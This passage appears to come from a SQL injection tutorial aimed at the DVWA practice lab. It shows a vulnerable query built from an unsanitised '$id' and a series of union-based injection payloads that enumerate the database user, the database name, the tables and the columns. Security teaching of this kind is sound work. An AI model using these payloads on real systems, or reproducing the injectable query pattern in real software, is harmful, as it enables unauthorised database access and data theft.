8. SQL Recomposition
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
Test whether there is an error:
1' and 1=1#
After recomposition, the query becomes:
"select first_name,last_name from users where user_id = '1' and 1=1#";
9. 5. SQL Injection
1' order by 1#
1' union all select 1,2#
1' union all select user(),database()#
1' union all select null,table_name from information_schema.tables#
1' union all select null,table_name from information_schema.tables where table_schema = 'dvwa'#
1' union all select null,column_name from information_schema.columns where table_schema ='dvwa'#